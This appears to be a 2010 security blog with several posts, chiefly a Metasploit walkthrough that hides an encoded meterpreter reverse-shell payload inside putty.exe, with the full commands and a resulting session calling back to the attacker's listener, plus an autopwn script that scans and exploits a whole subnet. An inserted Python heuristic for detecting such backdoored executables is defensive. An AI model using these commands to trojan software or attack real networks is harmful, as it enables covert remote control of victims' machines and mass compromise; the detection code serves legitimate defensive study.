Motorola Droid
- April 19th, 2010
Posting from my laptop tethered to my new Motorola Droid. This phone is sick. Now my only regret is how long I waited to get it!
SSL tunneled meterpreter sessions, Thanks HD.
So I’m writing my GCIA Gold paper on Network Data Visualization for Computer Network Defense. More than likely I’ll be posting some stuff regarding the research. Right now I am focusing on Open Source tools found on the DAVIX distribution. If anyone out there has experience with the subject, I would love to pick your brain.
For a while now it has been possible to add msfencoded payloads into executables. However, the resulting files would not work as expected: you could trick a user into running a file which would in turn give you a meterpreter session, but the user would soon find that something was amiss with the exe... not any more.
http://www.metasploit.com/redmine/projects/framework/repository/revisions/8896
./msfencode -h
Usage: ./msfencode
OPTIONS:
-a The architecture to encode as
-b The list of characters to avoid: '\x00\xff'
-c The number of times to encode the data
-e The encoder to use
-h Help banner
-i Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m Specifies an additional module search path
-n Dump encoder information
-o The output file
-p The platform to encode for
-s The maximum size of the encoded data
-t The format to display the encoded buffer with (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war)
-x Specify an alternate win32 executable template
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.199.129 LPORT=31337 R | ./msfencode -x putty.exe -t exe -k -o putty_backdoored.exe -e x86/shikata_ga_nai -c 10
[*] x86/shikata_ga_nai succeeded with size 315 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 342 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 369 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 396 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 423 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 450 (iteration=6)
[*] x86/shikata_ga_nai succeeded with size 477 (iteration=7)
[*] x86/shikata_ga_nai succeeded with size 504 (iteration=8)
[*] x86/shikata_ga_nai succeeded with size 531 (iteration=9)
[*] x86/shikata_ga_nai succeeded with size 558 (iteration=10)
file putty_backdoored.exe
putty_backdoored.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.199.129
LHOST => 192.168.199.129
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.199.129:31337
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.199.129:31337 -> 192.168.199.130:50766)
You’ll still need to migrate, or your shell will terminate when the backdoored process is killed.
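A defender-side check for the kind of backdoored binary described above, added here as an example; it is not part of the original post and not Metasploit code. It assumes, as a heuristic rather than a signature, that template-injected code tends to sit in an appended section that is both writable and executable, with the entry point redirected into it; the PE headers it scans are constructed inline, and the parser only reads the headers, so it runs offline on any PE file.

```python
import struct
IMAGE_SCN_MEM_EXECUTE = 0x20000000  # PE/COFF section characteristic flags
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_HDR = "<8sIIIIIIHHI"  # Name, VirtualSize, VirtualAddress, ..., Characteristics (40 bytes)

def parse_sections(data):
    """Return (AddressOfEntryPoint, [(name, virt_addr, virt_size, characteristics), ...])."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff, opt = e_lfanew + 4, e_lfanew + 24  # 20-byte COFF header, then the optional header
    _, num_sections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]  # AddressOfEntryPoint
    sections = []
    for i in range(num_sections):
        f = struct.unpack_from(SECTION_HDR, data, opt + opt_size + 40 * i)
        sections.append((f[0].rstrip(b"\0").decode("latin-1"), f[2], f[1], f[9]))
    return entry_rva, sections

def entry_point_findings(data):
    """Flag header traits suggesting the entry point was redirected into injected code (heuristic)."""
    entry_rva, sections = parse_sections(data)
    home = [i for i, (_, va, vs, _) in enumerate(sections) if va <= entry_rva < va + max(vs, 1)]
    if not home:
        return ["entry point lies outside every section"]
    idx = home[-1]
    name, _, _, chars = sections[idx]
    findings = []
    if chars & IMAGE_SCN_MEM_WRITE and chars & IMAGE_SCN_MEM_EXECUTE:
        findings.append(f"entry section {name!r} is writable and executable")
    if len(sections) > 1 and idx == len(sections) - 1:
        findings.append(f"entry point is in the last section {name!r}")
    if [s[0] for s in sections].count(name) > 1:
        findings.append(f"section name {name!r} appears more than once")
    return findings

def build_pe(sections, entry_rva):
    """Constructed minimal 32-bit PE header for testing only; not a runnable program."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x102)
    opt = struct.pack("<HBBIIIII", 0x10B, 0, 0, 0, 0, 0, entry_rva, 0).ljust(224, b"\0")
    hdrs = b"".join(struct.pack(SECTION_HDR, n.encode(), vs, va, 0, 0, 0, 0, 0, 0, ch) for n, va, vs, ch in sections)
    return dos + b"PE\0\0" + coff + opt + hdrs

CLEAN_SECTIONS = [(".text", 0x1000, 0x2000, 0x60000020), (".data", 0x3000, 0x1000, 0xC0000040)]
CLEAN = build_pe(CLEAN_SECTIONS, 0x1200)  # constructed: entry inside .text (code, read, execute)
INJECTED = build_pe(CLEAN_SECTIONS + [(".text", 0x4000, 0x300, 0xE0000020)], 0x4000)  # constructed: entry in appended RWX section
```

On a real file, read it in binary mode and pass the bytes to entry_point_findings; an empty list means none of the three heuristics fired, not that the file is clean.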
I just saw this on seclists.org.
HD Moore posted this to kick off db_autopwn via an msfconsole RC script:
$ vim ownitall.rc
db_create /tmp/mynet.db
db_nmap -sS -F -n 192.168.0.0/24 -T5
setg AutoRunScript scraper
db_autopwn -t -e -p -r
$ msfconsole -r ownitall.rc